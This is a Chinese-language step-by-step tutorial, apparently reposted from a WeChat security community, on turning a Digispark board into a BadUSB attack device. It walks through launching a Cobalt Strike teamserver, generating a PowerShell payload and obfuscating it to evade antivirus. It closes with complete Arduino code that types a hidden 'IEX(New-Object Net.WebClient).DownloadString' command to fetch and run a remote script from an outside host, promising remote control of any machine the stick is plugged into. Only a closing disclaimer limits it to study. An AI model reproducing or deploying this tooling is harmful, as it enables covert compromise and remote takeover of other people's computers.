0X00、工具准备
digispark开发板。
起初我买了下图的badusb,奈何自己运气太差,写入5-6次就gg了。硬件插上没任何反应了。
于是便搜索到另一款。
淘宝链接:https://m.tb.cn/h.VK7vwjy?sm=d85844
0X01、安装Arduino IDE环境
1、安装 arduino 的 IDE。
下载地址:https://www.arduino.cc/en/Main/Software
新版下载:https://downloads.arduino.cc/arduino-1.8.3-windows.zip
2、下载驱动
链接: https://pan.baidu.com/s/1FRLZr9_Rf4u-NMKV8WvNJA 提取码: bmey
3、驱动安装
如果是 64 位操作系统请选择 DPinst64.exe,否则请选择 DPinst.exe.
4、配置环境
点击文件--首选项
附加开发板管理器网址:http://digistump.com/package_digistump_index.json
点击工具--开发板管理器
等待下载完成,下载可能需要挂国外代理。
找到这个进行安装
安装完成后开发板选择这个
0X02、使用CobaltStrike生成木马
1、启动CS
服务器:
通过screen启动cs服务端
screen
./teamserver 129.204.113.202 admin888
ctrl + a+d 将当前程序放到后台。
客户端启动
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
客户端连接
2、生成木马
配置监听器:
使用CS生成powershell的脚本。
保存到桌面
3、编码混淆
PowerShell的免杀可以用Invoke-Obfuscation,Invoke-Obfuscation主要是对ps1脚本进行免杀,需要现有一个ps的payload。
进入Invoke-Obfuscation目录后,在PowerShell中执行命令
Import-Module .Invoke-Obfuscation.psd1
Invoke-Obfuscation
github:https://github.com/danielbohannon/Invoke-Obfuscation
然后执行命令,指定待处理的Ps1文件
set scriptpath c:xxxpayload.ps1
或者指定待处理的ps代码
set scriptblock 'echo xss'
输入encoding 并选择编码方式,比如2
输入命令,导出免杀ps文件到指定路径
out C:xxxxxx.ps1
运行上线,至此,简单免杀制作完成。
PowerShell.exe -file result.ps1
经测试,编码的并不能绕过Windows defender的实时保护。
4、放到远程服务器备用
将脚本上传到HTTP服务器备用
0X03、BadUsb制作
代码如下:
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
void setup() {
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
}
功能是下载打开windwos+r 运行窗口,输入命令执行。
点击上传,在60s之内插入你的badusb。
上传成功。
插哪哪上线!
0X04、参考链接
https://mp.weixin.qq.com/s/3lkdXK_g-_xcf378FNly1A
https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ
写在结尾
文章转自圈子社区成员qianxiao996的精华贴,特此感谢qianxiao996的分享输出。
文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
扫二维码|关注我们
引领实战潮流,回归技术本质
汇聚行业新锐力量 推动网络安全进步
这是一个实战派白帽子的聚集地
本文始发于微信公众号(Secquan圈子社区):手把手带你制作一个X谁谁上线的BadUSB!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论